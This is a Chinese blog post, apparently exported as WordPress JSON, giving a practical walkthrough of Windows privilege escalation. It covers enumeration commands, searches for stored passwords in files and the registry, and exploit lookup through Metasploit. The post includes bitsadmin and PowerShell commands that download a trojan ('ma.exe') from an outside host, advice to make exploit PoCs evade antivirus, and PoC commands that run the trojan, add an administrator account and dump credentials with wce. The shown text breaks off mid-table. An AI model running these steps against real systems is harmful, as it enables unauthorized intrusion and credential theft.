{"id":283366,"date":"2022-05-25T16:40:56","date_gmt":"2022-05-25T08:40:56","guid":{"rendered":"https:\/\/www.idc.net\/help\/283366\/"},"modified":"2022-05-25T16:40:56","modified_gmt":"2022-05-25T08:40:56","slug":"windows%e6%8f%90%e6%9d%83%e5%9f%ba%e7%a1%80%ef%bc%9a%e4%bf%a1%e6%81%af%e6%94%b6%e9%9b%86%e6%8a%80%e5%b7%a7%e5%8f%8a%e5%8f%af%e7%94%a8%e6%bc%8f%e6%b4%9e%e6%90%9c%e7%b4%a2","status":"publish","type":"post","link":"https:\/\/idc.net\/help\/283366\/","title":{"rendered":"Windows\u63d0\u6743\u57fa\u7840\uff1a\u4fe1\u606f\u6536\u96c6\u6280\u5de7\u53ca\u53ef\u7528\u6f0f\u6d1e\u641c\u7d22"},"content":{"rendered":"<p>\u3010\u3011\u5728\u6e17\u900f\u8fc7\u7a0b\u4e2d\u5f88\u591a\u4eba\u90fd\u8ba4\u4e3aWindows\u63d0\u6743\u5f88\u96be\uff0c\u5176\u6838\u5fc3\u662f\u638c\u63e1\u7684\u57fa\u7840\u4e0d\u591f\u624e\u5b9e\uff0c\u5f53\u7136\u9664\u4e86\u6781\u4e3a\u53d8\u6001\u7684\u6743\u9650\u8bbe\u7f6e\u7684\u670d\u52a1\u5668\uff0c\u57fa\u672c\u4e0a\u7b14\u8005\u9047\u5230\u7684\u670d\u52a1\u566899%\u90fd\u63d0\u6743\u6210\u529f\u4e86\uff0c\u672c\u6587\u6536\u96c6\u6574\u7406\u4e00\u4e9b\u8ddf\u63d0\u6743\u7d27\u5bc6\u76f8\u5173\u7684\u4fe1\u606f\u6536\u96c6\u6280\u5de7\u548c\u65b9\u6cd5\uff0c\u4ee5\u53ca\u5982\u4f55\u5728kali\u4e2d\u641c\u7d22\u53ef\u7528\u7684\u6f0f\u6d1e\uff0c\u6700\u540e\u6574\u7406\u4e86\u76ee\u524d\u53ef\u4f9b\u4f7f\u7528\u7684\u4e00\u4e9b\u6f0f\u6d1e\u5bf9\u5e94msf\u4e0b\u7684\u6a21\u5757\u4ee5\u53ca\u64cd\u4f5c\u7cfb\u7edf\u53ef\u63d0\u6743\u7684\u7248\u672c\u3002<\/p>\n<p><strong>\u4e00\u3001Windows\u63d0\u6743\u4fe1\u606f\u6536\u96c6<\/strong><\/p>\n<p>1. \u6536\u96c6OS\u540d\u79f0\u548c\u7248\u672c\u4fe1\u606f<\/p>\n<pre>\n \n \n \n <ol>\n  \n  \n  \n  <li><span><span>systeminfo&nbsp;|&nbsp;findstr&nbsp;\/B&nbsp;\/C:\"OS&nbsp;Name\"&nbsp;\/C:\"OS&nbsp;Version\"&nbsp;<\/span><\/span><\/li>\n  \n  \n  \n  <li><span>systeminfo&nbsp;|&nbsp;findstr&nbsp;\/B&nbsp;\/C:\"OS&nbsp;\u540d\u79f0\"&nbsp;\/C:\"OS&nbsp;\u7248\u672c\"&nbsp;<\/span><\/li>\n \n \n \n <\/ol><\/pre>\n<p>2. \u4e3b\u673a\u540d\u79f0\u548c\u6240\u6709\u73af\u5883\u53d8\u91cf<\/p>\n<ul>\n<li>\u4e3b\u673a\u540d\u79f0\uff1ahostname<\/li>\n<li>\u73af\u5883\u53d8\u91cf\uff1aSET<\/li>\n<\/ul>\n<p>3. \u67e5\u770b\u7528\u6237\u4fe1\u606f<\/p>\n<ul>\n<li>\u67e5\u770b\u6240\u6709\u7528\u6237\uff1anet user \u6216\u8005net1 user<\/li>\n<li>\u67e5\u770b\u7ba1\u7406\u5458\u7528\u6237\u7ec4\uff1anet localgroup administrators\u6216\u8005net1 localgroup administrators<\/li>\n<li>\u67e5\u770b\u8fdc\u7a0b\u7ec8\u7aef\u5728\u7ebf\u7528\u6237\uff1aquery user \u6216\u8005quser<\/li>\n<\/ul>\n<p>4. \u67e5\u770b\u8fdc\u7a0b\u7aef\u53e3<\/p>\n<p>(1)\u6ce8\u518c\u8868\u67e5\u770b<\/p>\n<pre>\n \n \n \n <ol>\n  \n  \n  \n  <li><span><span>REG&nbsp;query&nbsp;HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\"&nbsp;\"Server\\WinStations\\RDP-Tcp&nbsp;\/v&nbsp;PortNumber&nbsp;<\/span><\/span><\/li>\n \n \n \n <\/ol><\/pre>\n<p>(2)\u901a\u8fc7\u547d\u4ee4\u884c\u67e5\u770b<\/p>\n<ul>\n<li>\u83b7\u53d6\u5bf9\u5e94\u7684PID\u53f7\uff1atasklist \/svc | find \"TermService\"<\/li>\n<li>\u901a\u8fc7PID\u53f7\u67e5\u627e\u7aef\u53e3\uff1anetstat -ano | find \"1980\"<\/li>\n<\/ul>\n<p>5. \u67e5\u770b\u7f51\u7edc\u60c5\u51b5<\/p>\n<p>(1)\u7f51\u7edc\u914d\u7f6e\u60c5\u51b5\uff1aipconfig \/all<\/p>\n<p>(2)\u8def\u7531\u5668\u4fe1\u606f\uff1a route print<\/p>\n<p>(3)\u8981\u67e5\u770bARP\u7f13\u5b58\uff1a arp -A<\/p>\n<p>(4)\u67e5\u770b\u7f51\u7edc\u8fde\u63a5\uff1a netstat -ano<\/p>\n<p>(5)\u8981\u67e5\u770b\u9632\u706b\u5899\u89c4\u5219\uff1a<\/p>\n<pre>\n \n \n \n <ol>\n  \n  \n  \n  <li><span><span>netsh&nbsp;firewall&nbsp;show&nbsp;config&nbsp;&nbsp;<\/span><\/span><\/li>\n  \n  \n  \n  <li><span>netsh&nbsp;firewall&nbsp;show&nbsp;state&nbsp;<\/span><\/li>\n \n \n \n <\/ol><\/pre>\n<p>6. \u5e94\u7528\u7a0b\u5e8f\u548c\u670d\u52a1<\/p>\n<p>(1)\u8981\u67e5\u770b\u670d\u52a1\u7684\u8fdb\u7a0bID\uff1atasklist \/SVC<\/p>\n<p>(2)\u5df2\u5b89\u88c5\u9a71\u52a8\u7a0b\u5e8f\u7684\u5217\u8868\uff1aDRIVERQUERY<\/p>\n<p>(3)\u5df2\u7ecf\u542f\u52a8Windows \u670d\u52a1net start<\/p>\n<p>(4)\u67e5\u770b\u67d0\u670d\u52a1\u542f\u52a8\u6743\u9650\uff1asc qc TermService<\/p>\n<p>(5)\u5df2\u5b89\u88c5\u7a0b\u5e8f\u7684\u5217\u8868\uff1awmic product list brief<\/p>\n<p>(6)\u67e5\u770b\u670d\u52a1\u5217\u8868\uff1awmic service list brief # Lists services<\/p>\n<p>(7)\u67e5\u770b\u8fdb\u7a0b\u5217\u8868wmic process list brief # Lists processes<\/p>\n<p>(8)\u67e5\u770b\u542f\u52a8\u7a0b\u5e8f\u5217\u8868wmic startup list brief # Lists startup items<\/p>\n<p>(9)\u68c0\u67e5\u8865\u4e01\u5df2\u5b89\u88c5\u7684\u66f4\u65b0\u548c\u5b89\u88c5\u65e5\u671f<\/p>\n<pre>\n \n \n \n <ol>\n  \n  \n  \n  <li><span><span>wmic&nbsp;qfe&nbsp;get&nbsp;Caption,De**ion,HotFixID,InstalledOn&nbsp;<\/span><\/span><\/li>\n \n \n \n <\/ol><\/pre>\n<p>\u641c\u7d22\uff0c\u60a8\u53ef\u4ee5\u4f7f\u7528\u63d0\u5347\u6743\u9650\u7684\u7279\u5b9a\u6f0f\u6d1e\uff1a<\/p>\n<pre>\n \n \n \n <ol>\n  \n  \n  \n  <li><span><span>wmic&nbsp;qfe&nbsp;get&nbsp;Caption,De**ion,HotFixID,InstalledOn&nbsp;|&nbsp;findstr&nbsp;&nbsp;\/C:\"KBxxxxxxx\"&nbsp;<\/span><\/span><\/li>\n \n \n \n <\/ol><\/pre>\n<p>\u6267\u884c\u4e0a\u9762\u7684\u547d\u4ee4\u7684\u6ca1\u6709\u8f93\u51fa\uff0c\u610f\u5473\u7740\u90a3\u4e2a\u8865\u4e01\u672a\u5b89\u88c5\u3002<\/p>\n<p>(10)\u7ed3\u675f\u7a0b\u5e8f\uff1a<\/p>\n<pre>\n \n \n \n <ol>\n  \n  \n  \n  <li><span><span>wmic&nbsp;process&nbsp;where&nbsp;<\/span><span>name<\/span><span>=<\/span><span>\"iexplore.exe\"<\/span><span>&nbsp;call&nbsp;terminate&nbsp;<\/span><\/span><\/li>\n \n \n \n <\/ol><\/pre>\n<p>7. \u68c0\u7d22\u654f\u611f\u6587\u4ef6<\/p>\n<pre>\n \n \n \n <ol>\n  \n  \n  \n  <li><span><span>dir&nbsp;\/b\/s&nbsp;password.txt&nbsp;<\/span><\/span><\/li>\n  \n  \n  \n  <li><span>dir&nbsp;\/b&nbsp;\/s&nbsp;*.doc&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>dir&nbsp;\/b&nbsp;\/s&nbsp;*.ppt&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>dir&nbsp;\/b&nbsp;\/s&nbsp;*.xls&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>dir&nbsp;\/b&nbsp;\/s&nbsp;*.&nbsp;docx&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>dir&nbsp;\/b&nbsp;\/s&nbsp;*.xlsx&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>dir&nbsp;\/b\/s&nbsp;config.*&nbsp;filesystem&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>findstr&nbsp;\/si&nbsp;password&nbsp;*.xml&nbsp;*.ini&nbsp;*.txt&nbsp;&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>findstr&nbsp;\/si&nbsp;login&nbsp;*.xml&nbsp;*.ini&nbsp;*.txt&nbsp;<\/span><\/li>\n \n \n \n <\/ol><\/pre>\n<p>\u9664\u6b64\u4e4b\u5916\uff0c\u60a8\u8fd8\u53ef\u4ee5\u68c0\u67e5\u65e0\u4eba\u503c\u5b88\u5b89\u88c5\u65e5\u5fd7\u6587\u4ef6\u3002\u8fd9\u4e9b\u6587\u4ef6\u901a\u5e38\u5305\u542bbase64\u7f16\u7801\u7684\u5bc6\u7801\u3002\u4f60\u66f4\u53ef\u80fd\u5728\u5927\u578b\u4f01\u4e1a\u4e2d\uff0c\u5176\u4e2d\u5355\u4e2a\u7cfb\u7edf\u7684\u624b\u52a8\u5b89\u88c5\u662f\u4e0d\u5207\u5b9e\u9645\u7684\uff0c\u627e\u5230\u8fd9\u4e9b\u6587\u4ef6\u5373\u53ef\u83b7\u53d6\u7ba1\u7406\u5458\u5bc6\u7801\u3002\u8fd9\u4e9b\u6587\u4ef6\u7684\u5171\u540c\u4f4d\u7f6e\u662f\uff1a<\/p>\n<ul>\n<li>C:\\sysprep.inf<\/li>\n<li>C:\\sysprep\\sysprep.xml<\/li>\n<li>C:\\Windows\\Panther\\Unattend\\Unattended.xml<\/li>\n<li>C:\\Windows\\Panther\\Unattended.xml<\/li>\n<\/ul>\n<p>8. \u76ee\u5f55\u6587\u4ef6\u64cd\u4f5c<\/p>\n<p>(1)\u5217\u51fad:\\www\u7684\u6240\u6709\u76ee\u5f55\uff1a<\/p>\n<pre>\n \n \n \n <ol>\n  \n  \n  \n  <li><span><span>for&nbsp;\/d&nbsp;%i&nbsp;in&nbsp;(d:\\www\\*)&nbsp;do&nbsp;@echo&nbsp;%i&nbsp;<\/span><\/span><\/li>\n \n \n \n <\/ol><\/pre>\n<p>(2)\u628a\u5f53\u524d\u8def\u5f84\u4e0b\u6587\u4ef6\u5939\u7684\u540d\u5b57\u53ea\u67091-3\u4e2a\u5b57\u6bcd\u7684\u663e\u793a\u51fa\u6765\uff1a<\/p>\n<pre>\n \n \n \n <ol>\n  \n  \n  \n  <li><span><span>for&nbsp;\/d&nbsp;%i&nbsp;in&nbsp;(???)&nbsp;do&nbsp;@echo&nbsp;%i&nbsp;<\/span><\/span><\/li>\n \n \n \n <\/ol><\/pre>\n<p>(3)\u4ee5\u5f53\u524d\u76ee\u5f55\u4e3a\u641c\u7d22\u8def\u5f84\uff0c\u628a\u5f53\u524d\u76ee\u5f55\u4e0e\u4e0b\u9762\u7684\u5b50\u76ee\u5f55\u7684\u5168\u90e8EXE\u6587\u4ef6\u5217\u51fa\uff1a<\/p>\n<pre>\n \n \n \n <ol>\n  \n  \n  \n  <li><span><span>for&nbsp;\/r&nbsp;%i&nbsp;in&nbsp;(*.exe)&nbsp;do&nbsp;@echo&nbsp;%i&nbsp;<\/span><\/span><\/li>\n \n \n \n <\/ol><\/pre>\n<p>(4)\u4ee5\u6307\u5b9a\u76ee\u5f55\u4e3a\u641c\u7d22\u8def\u5f84\uff0c\u628a\u5f53\u524d\u76ee\u5f55\u4e0e\u4e0b\u9762\u7684\u5b50\u76ee\u5f55\u7684\u6240\u6709\u6587\u4ef6\u5217\u51fa<\/p>\n<pre>\n \n \n \n <ol>\n  \n  \n  \n  <li><span><span>for&nbsp;\/r&nbsp;\"f:\\freehost\\hmadesign\\web\\\"&nbsp;%i&nbsp;in&nbsp;(*.*)&nbsp;do&nbsp;@echo&nbsp;%i&nbsp;<\/span><\/span><\/li>\n \n \n \n <\/ol><\/pre>\n<p>(5)\u663e\u793aa.txt\u91cc\u9762\u7684\u5185\u5bb9\uff0c\u56e0\u4e3a\/f\u7684\u4f5c\u7528\uff0c\u4f1a\u8bfb\u51faa.txt\u4e2d\uff1a<\/p>\n<pre>\n \n \n \n <ol>\n  \n  \n  \n  <li><span><span>for&nbsp;\/f&nbsp;%i&nbsp;in&nbsp;(c:\\1.txt)&nbsp;do&nbsp;echo&nbsp;%i&nbsp;<\/span><\/span><\/li>\n \n \n \n <\/ol><\/pre>\n<p>9. RAR\u6253\u5305<\/p>\n<pre>\n \n \n \n <ol>\n  \n  \n  \n  <li><span><span>rar&nbsp;a&nbsp;-k&nbsp;-r&nbsp;-s&nbsp;-m3&nbsp;c:\\1.rar&nbsp;d:\\wwwroot&nbsp;<\/span><\/span><\/li>\n \n \n \n <\/ol><\/pre>\n<p>10. php\u8bfb\u6587\u4ef6<\/p>\n<pre>\n \n \n \n <ol>\n  \n  \n  \n  <li><span><span>c:\/php\/php.exe&nbsp;\"c:\/www\/admin\/1.php\"&nbsp;<\/span><\/span><\/li>\n \n \n \n <\/ol><\/pre>\n<p>11. Windows7\u53ca\u4ee5\u4e0a\u7684\u7248\u672c\u64cd\u4f5c\u7cfb\u7edf\u6587\u4ef6\u4e0b\u8f7d\u53ef\u4ee5\u4f7f\u7528\u7684bitsadmin\u548cpowershell\uff1a<\/p>\n<pre>\n \n \n \n <ol>\n  \n  \n  \n  <li><span><span>bitsadmin&nbsp;\/transfer&nbsp;myjob1&nbsp;\/download&nbsp;\/priority&nbsp;normal&nbsp;http:\/\/www.antian365.com\/lab\/4433.exe&nbsp;c:\\ma.exe&nbsp;<\/span><\/span><\/li>\n  \n  \n  \n  <li><span>powershell&nbsp;(new-object&nbsp;System.Net.WebClient).DownloadFile('&nbsp;http:\/\/www.antian365.com\/ma.exe','ma.exe')&nbsp;<\/span><\/li>\n \n \n \n <\/ol><\/pre>\n<p>12. \u6ce8\u518c\u8868\u5173\u952e\u5b57\u641c\u7d22\uff0cpassword\u4e3a\u5173\u952e\u5b57\uff0c\u53ef\u4ee5\u662fvnc\u7b49\u654f\u611f\u5173\u952e\u5b57<\/p>\n<pre>\n \n \n \n <ol>\n  \n  \n  \n  <li><span><span>reg&nbsp;query&nbsp;HKLM&nbsp;\/f&nbsp;password&nbsp;\/t&nbsp;REG_SZ&nbsp;\/s&nbsp;<\/span><\/span><\/li>\n  \n  \n  \n  <li><span>reg&nbsp;query&nbsp;HKCU&nbsp;\/f&nbsp;password&nbsp;\/t&nbsp;REG_SZ&nbsp;\/s&nbsp;<\/span><\/li>\n \n \n \n <\/ol><\/pre>\n<p>13.\u7cfb\u7edf\u6743\u9650\u914d\u7f6e<\/p>\n<pre>\n \n \n \n <ol>\n  \n  \n  \n  <li><span><span>cacls&nbsp;c:\\&nbsp;<\/span><\/span><\/li>\n  \n  \n  \n  <li><span>cacls&nbsp;c:\\windows\\ma.exe&nbsp;\u67e5\u770bma.exe\u7684\u6743\u9650\u914d\u7f6e&nbsp;<\/span><\/li>\n \n \n \n <\/ol><\/pre>\n<p>14.\u81ea\u52a8\u6536\u96c6\u7cfb\u7edf\u6709\u7528\u4fe1\u606f\u811a\u672c<\/p>\n<pre>\n \n \n \n <ol>\n  \n  \n  \n  <li><span><span>for&nbsp;\/f&nbsp;\"<\/span><span>delims<\/span><span>=\"&nbsp;%%A&nbsp;in&nbsp;('dir&nbsp;\/s&nbsp;\/b&nbsp;%WINDIR%\\system32\\*htable.xsl')&nbsp;do&nbsp;set&nbsp;\"<\/span><span>var<\/span><span>=%%A\"&nbsp;<\/span><\/span><\/li>\n  \n  \n  \n  <li><span>wmic&nbsp;process&nbsp;get&nbsp;CSName,Description,ExecutablePath,ProcessId&nbsp;\/format:\"%var%\"&nbsp;<span>&gt;<\/span><span>&gt;<\/span><span>&nbsp;out.html&nbsp;<\/span><\/span><\/li>\n  \n  \n  \n  <li><span>wmic&nbsp;service&nbsp;get&nbsp;Caption,Name,PathName,ServiceType,Started,StartMode,StartName&nbsp;\/format:\"%var%\"&nbsp;<span>&gt;<\/span><span>&gt;<\/span><span>&nbsp;out.html&nbsp;<\/span><\/span><\/li>\n  \n  \n  \n  <li><span>wmic&nbsp;USERACCOUNT&nbsp;list&nbsp;full&nbsp;\/format:\"%var%\"&nbsp;<span>&gt;<\/span><span>&gt;<\/span><span>&nbsp;out.html&nbsp;<\/span><\/span><\/li>\n  \n  \n  \n  <li><span>wmic&nbsp;group&nbsp;list&nbsp;full&nbsp;\/format:\"%var%\"&nbsp;<span>&gt;<\/span><span>&gt;<\/span><span>&nbsp;out.html&nbsp;<\/span><\/span><\/li>\n  \n  \n  \n  <li><span>wmic&nbsp;nicconfig&nbsp;where&nbsp;<span>IPEnabled<\/span><span>=<\/span><span>'true'<\/span><span>&nbsp;get&nbsp;Caption,DefaultIPGateway,Description,DHCPEnabled,DHCPServer,IPAddress,IPSubnet,MACAddress&nbsp;\/format:\"%var%\"&nbsp;<\/span><span>&gt;<\/span><span>&gt;<\/span><span>&nbsp;out.html&nbsp;<\/span><\/span><\/li>\n  \n  \n  \n  <li><span>wmic&nbsp;volume&nbsp;get&nbsp;Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace&nbsp;\/format:\"%var%\"&nbsp;<span>&gt;<\/span><span>&gt;<\/span><span>&nbsp;out.html&nbsp;<\/span><\/span><\/li>\n  \n  \n  \n  <li><span>wmic&nbsp;netuse&nbsp;list&nbsp;full&nbsp;\/format:\"%var%\"&nbsp;<span>&gt;<\/span><span>&gt;<\/span><span>&nbsp;out.html&nbsp;<\/span><\/span><\/li>\n  \n  \n  \n  <li><span>wmic&nbsp;qfe&nbsp;get&nbsp;Caption,Description,HotFixID,InstalledOn&nbsp;\/format:\"%var%\"&nbsp;<span>&gt;<\/span><span>&gt;<\/span><span>&nbsp;out.html&nbsp;<\/span><\/span><\/li>\n  \n  \n  \n  <li><span>wmic&nbsp;startup&nbsp;get&nbsp;Caption,Command,Location,User&nbsp;\/format:\"%var%\"&nbsp;<span>&gt;<\/span><span>&gt;<\/span><span>&nbsp;out.html&nbsp;<\/span><\/span><\/li>\n  \n  \n  \n  <li><span>wmic&nbsp;PRODUCT&nbsp;get&nbsp;Description,InstallDate,InstallLocation,PackageCache,Vendor,Version&nbsp;\/format:\"%var%\"&nbsp;<span>&gt;<\/span><span>&gt;<\/span><span>&nbsp;out.html&nbsp;<\/span><\/span><\/li>\n  \n  \n  \n  <li><span>wmic&nbsp;os&nbsp;get&nbsp;name,version,InstallDate,LastBootUpTime,LocalDateTime,Manufacturer,RegisteredUser,ServicePackMajorVersion,SystemDirectory&nbsp;\/format:\"%var%\"&nbsp;<span>&gt;<\/span><span>&gt;<\/span><span>&nbsp;out.html&nbsp;<\/span><\/span><\/li>\n  \n  \n  \n  <li><span>wmic&nbsp;Timezone&nbsp;get&nbsp;DaylightName,Description,StandardName&nbsp;\/format:\"%var%\"&nbsp;<span>&gt;<\/span><span>&gt;<\/span><span>&nbsp;out.html&nbsp;<\/span><\/span><\/li>\n \n \n \n <\/ol><\/pre>\n<p><strong>\u4e8c\u3001Windows\u63d0\u6743\u51c6\u5907<\/strong><\/p>\n<p>\u901a\u8fc7\u524d\u9762\u7684\u57fa\u7840\u547d\u4ee4\u4ee5\u53ca\u672c\u7ae0\u7684\u7b2c\u4e8c\u7ae0\u8282\uff0c\u53ef\u4ee5\u6709\u9488\u5bf9\u6027\u7684\u5bf9\u76ee\u6807\u5f00\u5c55\u63d0\u6743\u5de5\u4f5c\uff0c\u6839\u636eWindows-Exploit-Suggester\u83b7\u53d6\u76ee\u524d\u7cfb\u7edf\u53ef\u80fd\u5b58\u5728\u7684\u6f0f\u6d1e\u3002<\/p>\n<p>1. \u6536\u96c6\u5e76\u7f16\u8bd1\u76f8\u5173POC<\/p>\n<p>2. \u82e5\u64cd\u4f5c\u7cfb\u7edf\u6709\u6740\u6bd2\u8f6f\u4ef6\u4ee5\u53ca\u5b89\u5168\u9632\u62a4\u8f6f\u4ef6\uff0c\u5219\u9700\u8981\u5bf9\u63d0\u6743POC\u8fdb\u884c\u514d\u6740\uff0c\u5426\u5219\u8fdb\u884c\u4e0b\u4e00\u6b65\u3002<\/p>\n<p>3. \u4e0a\u4f20POC<\/p>\n<p>4. \u6709webshell\u6216\u8005\u53cd\u5f39webshell\u6765\u6267\u884c\u547d\u4ee4<\/p>\n<p>5. \u641c\u7d22\u6f0f\u6d1e\uff0c\u6839\u636e\u5173\u952e\u5b57\u8fdb\u884c\u641c\u7d22\u4f8b\u5982MS10-061\u3002<\/p>\n<p>(1)\u5728\u767e\u5ea6\u6d4f\u89c8\u5668\u4e2d\u641c\u7d22\u201cMS10-061 site:exploit-db.com\u201d<\/p>\n<p>(2)packetstormsecurity\u7f51\u7ad9\u641c\u7d22<\/p>\n<p>https:\/\/packetstormsecurity.com\/search\/?q=MS16-016<\/p>\n<p>(3)\u5b89\u5168\u7126\u70b9\uff0c\u5176BugTraq\u662f\u4e00\u4e2a\u51fa\u8272\u7684\u6f0f\u6d1e\u548cexploit\u6570\u636e\u6e90\uff0c\u53ef\u4ee5\u901a\u8fc7CVE\u7f16\u53f7\uff0c\u6216\u8005\u4ea7\u54c1\u4fe1\u606f\u6f0f\u6d1e\u76f4\u63a5\u641c\u7d22\u3002\u7f51\u5740\uff1ahttp:\/\/www.securityfocus.com\/bid\u3002<\/p>\n<p><strong>\u4e09\u3001\u4f7f\u7528msf\u5e73\u53f0\u641c\u7d22\u53ef\u5229\u7528POC<\/strong><\/p>\n<p>1. \u641c\u7d22poc<\/p>\n<p>\u5728kali\u4e2d\u6253\u5f00msf\u6216\u8005\u6267\u884c\u201c\/usr\/bin\/msfconsole\u201d\uff0c\u5728\u51fa\u6765\u7684\u547d\u4ee4\u63d0\u793a\u7b26\u4e0b\u4f7f\u7528\u547d\u4ee4\u8fdb\u884c\u641c\u7d22\uff1a<\/p>\n<pre>\n \n \n \n <ol>\n  \n  \n  \n  <li><span><span>search&nbsp;ms08&nbsp;<\/span><\/span><\/li>\n  \n  \n  \n  <li><span>search&nbsp;ms09&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>search&nbsp;ms10&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>search&nbsp;ms11&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>search&nbsp;ms12&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>search&nbsp;ms13&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>search&nbsp;ms14&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>search&nbsp;ms15&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>search&nbsp;ms16&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>search&nbsp;ms17&nbsp;<\/span><\/li>\n \n \n \n <\/ol><\/pre>\n<p>\u4ee5\u4e0a\u547d\u4ee4\u5c06\u641c\u7d222008\u5e74\u81f32017\u5e74\u7684\u6240\u6709\u53ef\u7528\u7684Windows\u4e0b\u7684exploit\uff0c\u4f8b\u5982\u641c\u7d222015\u5e74\u7684exploit\uff0c\u5982\u56fe1\u6240\u793a\u3002<\/p>\n<p style=\"text-align: center\">\n<p style=\"text-align: center\">\u56fe1\u641c\u7d222015\u5e74\u6240\u6709\u53ef\u7528\u76840day<\/p>\n<p>2. \u67e5\u770b\u76f8\u5173\u6f0f\u6d1e\u60c5\u51b5<\/p>\n<p>\u53ef\u4ee5\u901a\u8fc7\u5fae\u8f6f\u5b98\u65b9\u7f51\u7ad9\u67e5\u770b\u6f0f\u6d1e\u5bf9\u5e94\u7684\u7248\u672c\uff0c\u5229\u7528\u65b9\u5f0f\u4e3ahttps:\/\/technet.microsoft.com\/library\/security\/\u6f0f\u6d1e\u53f7\uff0c\u4f8b\u5982\u67e5\u770bms08-068\u5219\u5176\u7f51\u9875\u6253\u5f00\u65b9\u5f0f\u4e3a\uff1ahttps:\/\/technet.microsoft.com\/library\/security\/ms08-068\uff0c\u5982\u56fe2\u6240\u793a\uff0c\u5982\u679c\u663e\u793a\u4e3a\u4e25\u91cd\u5219\u8868\u660e\u53ef\u4ee5\u88ab\u5229\u7528\u3002<\/p>\n<p style=\"text-align: center\">\n<p style=\"text-align: center\">\u56fe2\u5fae\u8f6f\u5b98\u65b9\u5bf9\u5e94\u7248\u672c\u53f7<\/p>\n<p><strong>\u56db\u3001\u5b9e\u65bd\u63d0\u6743<\/strong><\/p>\n<p>\u6267\u884c\u547d\u4ee4\u3002\u6bd4\u5982\u53ef\u5229\u7528poc\u6587\u4ef6\u4e3apoc.exe\uff0c\u5219\u53ef\u4ee5\u4f7f\u7528\u5982\u4e0b\u7684\u4e00\u4e9b\u547d\u4ee4\u63d0\u6743\uff1a<\/p>\n<p>(1)\u76f4\u63a5\u6267\u884c\u6728\u9a6c\u3002<\/p>\n<pre>\n \n \n \n <ol>\n  \n  \n  \n  <li><span><span>poc.exe&nbsp;ma.exe&nbsp;<\/span><\/span><\/li>\n \n \n \n <\/ol><\/pre>\n<p>(2)\u6dfb\u52a0\u7528\u6237<\/p>\n<pre>\n \n \n \n <ol>\n  \n  \n  \n  <li><span><span>poc.exe&nbsp;\"net&nbsp;user&nbsp;antian365&nbsp;1qaz2wsx&nbsp;\/add\"&nbsp;<\/span><\/span><\/li>\n  \n  \n  \n  <li><span>poc.exe&nbsp;\"net&nbsp;localgroup&nbsp;administrators&nbsp;antian365&nbsp;\/add\"&nbsp;<\/span><\/li>\n \n \n \n <\/ol><\/pre>\n<p>(3)\u83b7\u53d6\u660e\u6587\u5bc6\u7801\u6216\u8005\u54c8\u5e0c\u503c<\/p>\n<pre>\n \n \n \n <ol>\n  \n  \n  \n  <li><span><span>poc.exe&nbsp;\"wce32.exe&nbsp;-w\"&nbsp;&nbsp;<\/span><\/span><\/li>\n  \n  \n  \n  <li><span>poc.exe&nbsp;\"wce64.exe&nbsp;-w\"&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>poc.exe&nbsp;\"wce32\"&nbsp;<\/span><\/li>\n \n \n \n <\/ol><\/pre>\n<p><strong>\u4e94\u3001\u76f8\u5173\u8d44\u6e90\u4e0b\u8f7d<\/strong><\/p>\n<p>1. Tools\u4e0b\u8f7d<\/p>\n<p>wce\u4e0b\u8f7d\uff1a<\/p>\n<ul>\n<li>http:\/\/www.ampliasecurity.com\/research\/windows-credentials-editor\/<\/li>\n<li>http:\/\/www.ampliasecurity.com\/research\/wce_v1_42beta_x32.zip<\/li>\n<li>http:\/\/www.ampliasecurity.com\/research\/wce_v1_42beta_x64.zip<\/li>\n<li>sysinternals \uff1ahttps:\/\/technet.microsoft.com\/en-us\/sysinternals\/bb842062<\/li>\n<li>mimikatz \uff1ahttp:\/\/blog.gentilkiwi.com\/mimikatz<\/li>\n<li>python \uff1ahttps:\/\/www.python.org\/downloads\/windows\/<\/li>\n<\/ul>\n<p>2. \u641c\u7d22\u6f0f\u6d1e\u548cshellcode<\/p>\n<ul>\n<li>http:\/\/www.exploit-db.com<\/li>\n<li>http:\/\/1337day.com<\/li>\n<li>http:\/\/0day.today<\/li>\n<li>http:\/\/www.securityfocus.com<\/li>\n<li>http:\/\/seclists.org\/fulldisclosure\/<\/li>\n<li>http:\/\/www.exploitsearch.net<\/li>\n<li>http:\/\/www.securiteam.com<\/li>\n<li>http:\/\/metasploit.com\/modules\/<\/li>\n<li>http:\/\/securityreason.com<\/li>\n<li>https:\/\/cxsecurity.com\/exploit\/<\/li>\n<li>http:\/\/securitytracker.com\/<\/li>\n<\/ul>\n<p><strong>\u516d\u3001Windows\u672c\u5730\u6ea2\u51fa\u6f0f\u6d1e\u5bf9\u5e94\u8868<\/strong><\/p>\n<p>Windows2003\u5bf9\u5e94\u6f0f\u6d1e\u3001\u7f16\u53f7\u53ca\u5176\u5f71\u54cd\u7cfb\u7edf\u53camsf\u6a21\u5757<\/p>\n<p>1. 2007\u5e74\u5bf9\u5e94\u6f0f\u6d1e\u3001\u7f16\u53f7\u53ca\u5176\u5f71\u54cd\u7cfb\u7edf\u53camsf\u6a21\u5757<\/p>\n<pre>\n \n \n \n <ol>\n  \n  \n  \n  <li><span><span>\uff081\uff09KB935966&nbsp;|MS07-029&nbsp;&nbsp;Win2000SP4\u3001Win2003SP1\/SP2&nbsp;exploit\/windows\/dcerpc\/ms07_029_msdns_zonename&nbsp;<\/span><\/span><\/li>\n  \n  \n  \n  <li><span>exploit\/windows\/smb\/ms07_029_msdns_zonename&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>\uff082\uff09KB937894|&nbsp;MS07-065&nbsp;WinxpSP2\u3001Win2000SP4\u3001WinXP-x64-SP2\u3001Win2003SP1\/SP2&nbsp;<\/span><\/li>\n  \n  \n  \n  